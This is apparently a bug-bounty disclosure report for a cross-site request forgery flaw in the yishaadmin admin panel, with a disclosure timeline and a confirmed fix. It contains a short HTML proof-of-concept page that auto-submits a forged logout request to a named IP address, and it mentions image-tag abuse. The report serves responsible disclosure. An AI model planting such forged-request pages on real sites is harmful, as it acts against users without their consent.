Cross-Site Request Forgery (CSRF) in liukuo362573/yishaadmin

Valid

Reported on

Jan 7th 2022


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://106.14.124.170/admin/Home/LoginOff">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability is capable of forging users to unintentional logout.

More details

One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the liukuo362573/yishaadmin team within 24 hours. 21 days ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 20 days ago
We have contacted a member of the liukuo362573/yishaadmin team and are waiting to hear back 19 days ago
liukuo362573 validated this vulnerability 19 days ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
liukuo362573 confirmed that a fix has been merged on 4ef52f 17 days ago
The fix bounty has been dropped
HomeController.cs#L71-L101 has been validated